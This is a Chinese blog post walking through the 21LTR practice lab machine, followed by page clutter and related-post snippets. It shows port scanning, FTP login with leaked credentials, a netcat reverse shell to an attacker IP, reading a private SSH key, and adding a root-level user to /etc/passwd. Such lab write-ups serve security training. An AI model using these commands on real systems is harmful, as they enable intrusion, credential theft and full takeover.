21LTR靶机(漏洞复现)

于 2024-09-18 18:59:21 发布
阅读量354 收藏
点赞数 8
文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75569982/article/details/142340968
版权

网卡配置

访问网页

端口扫描

nmap -sV -p- 192.168.2.120

0

目录扫描

右键检查,发现用户名和密码

尝试ssh连接,连接失败

尝试ftp连接,连接成功

发现一个backup_log.php文件

nc -e /bin/sh 192.168.2.128 5555

python -c 'import pty; pty.spawn("/bin/sh")'

提权

cd /media/USB_1/Stuff/Keys
ls
cat authorized_keys    #发现是hbeale用户

cat id_rsa

echo 'newuser:$1$Ed671o/.$SLi1S6D.lp5G24zQfGMCj.:0:0:root:/root:/bin/bash' >> /etc/passwd

Ad
关注
LTR-578ALS_Spec & Design Guides_V1.3.pdf
04-07
LTR-578ALS is a 3-in-1 sensor module, digital light sensor (ALS) + proximity sensor (PS) + built-in IR LED (940nm) with direct I2C interface, in a miniature chipled lead-free surface mount package ...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
21LTR 靶机
weixin_62162207的博客
07-30 149
在端⼝ 10001 上启动了⼀个 netcat 会话,我们得到了⼀个空⽩的 shell,往里写入一个webshell。发现还开放着ssh和ftp端口,尝试利用源代码泄露出的账号密码远程连接。查看authorized_keys 文件,找到一个账户。发现内容可能是一个日志文件,尝试网页打开,打开成功。查看账号信息,发现确实有一个hbeale的账户。查看/etc/passwd文件权限,有写入权限。右键查看页面源代码,发现了一个账号密码。dir发现该目录下有一个文件且是满权限。尝试访问,发现没有权限。
21LTR: Scene 1靶机
m0_61995767的博客
07-30 598
21LTR: Scene 1打靶记录
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 387
21LTR:Scene1靶机,打靶文章
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 437
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
21 LTR Scene1复现
weixin_61982677的博客
09-14 243
修改靶机和 kali 攻击机网络模式为仅主机模式置于同一张网卡下。在日志文件中写入 一句话木马,需要利用 10001 端口。添加 root权限用户成功,切换 root权限用户。将hash密码拼接 添加到/etc/passwd。发现存在hbeale用户,尝试用秘钥文件登录。连接成功,输入 ls 查看该目录下的文件。发现是个日志文件,拼接之前扫到的目录访问。发现一个文件,下载到 kali,查看。拼接参数值,写入反弹shell语句。查看/etc.passwd。失败,尝试 ftp 连接。成功反弹 shell。
21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
zdd1453691081的博客
07-30 377
【代码】21LTR.com_Scene1_2.120_v1.0靶机(超级详细,看了就会)
Vulhub21LTR:Scene靶机详解
weixin_62457642的博客
09-13 477
靶机21LTR:Scene速刷
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 429
【代码】21LTR-Scene靶机渗透测试。
21LTR:Scene1靶机详情
xiaoyanglailo的博客
09-14 353
靶机下载链接:一、靶机搭建将靶机调到仅主机模式我这边是自己做了一张仅主机的网卡靶机的IP显示。
21ltr-scene-1靶机
m0_65285254的博客
07-31 298
根据靶机描述,该靶机静态ip地址为192.168.2.120。因为之前扫描到ftp,ssh端口开放,使用该密码分别进行连接。ls查看文件,发现 backup_log.php 文件。利用/etc/passwd可写提权,写入用户到该文件中。访问/logs/backup_log.php 成功。按照格式将其echo到文件/etc/passwd中。扫描开放的全端口 开放21,22,80端口。当在网页上拼接访问logs时,访问被拒绝。将其下载到本地,在kali上查看内容。没发现什么功能点,对其进行目录扫描。
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
二十种编程语言庆祝中秋节
敲代码别忘了喝上一杯凉白开。
09-17 999
在全球范围内,编程语言作为技术沟通的桥梁,不仅仅局限于解决技术问题,还能承载文化传递的使命。本文展示了如何使用二十种不同的编程语言来表达对中秋节的祝福,这些语言包括了Python、C、C++、Java、C#、Perl、Go、ASP、PHP、JavaScript、HTML、Visual Basic、VB早期版本、Visual C++、Delphi、Shell、Cobol、ActionScript、Foxpro和DOS批处理。每种语言的代码示例简单直接,都以其独特的语法输出“祝大家中秋快乐”的信息。
report ETL .ffff
09-17
report ETL .ffff
基于ssm的共享充电宝管理系统设计与实现.docx
09-17
基于ssm的共享充电宝管理系统设计与实现.docx
操作系统大作业_Linux_命令行_OSWork.zip
最新发布
09-17
操作系统大作业_Linux_命令行_OSWork
Java项目-基于SSM+Jsp的社区管理与服务系统的设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件)
09-17
【基于SSM+Jsp的社区管理与服务系统的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于SSM+Jsp的社区管理与服务系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值